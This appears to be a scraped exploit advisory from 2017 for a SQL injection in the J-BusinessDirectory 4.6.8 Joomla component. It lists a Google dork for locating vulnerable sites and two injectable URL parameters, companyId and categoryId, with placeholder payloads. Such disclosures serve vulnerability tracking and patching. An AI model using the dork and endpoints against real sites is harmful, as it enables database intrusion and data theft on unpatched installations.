19 lines
No EOL
769 B
Text
19 lines
No EOL
769 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component J-BusinessDirectory v4.6.8 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_jbusinessdirectory
|
|
# Date: 21.02.2017
|
|
# Vendor Homepage: http://www.cmsjunkie.com/
|
|
# Software Buy: http://www.cmsjunkie.com/ajax/index/options/product_id/73/
|
|
# Demo: http://demo.cmsjunkie.com/j-businessdirectory/
|
|
# Version: 4.6.8
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=companies&companyId=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=search&searchkeyword=1&categoryId=[SQL]
|
|
# Etc...
|
|
# # # # # |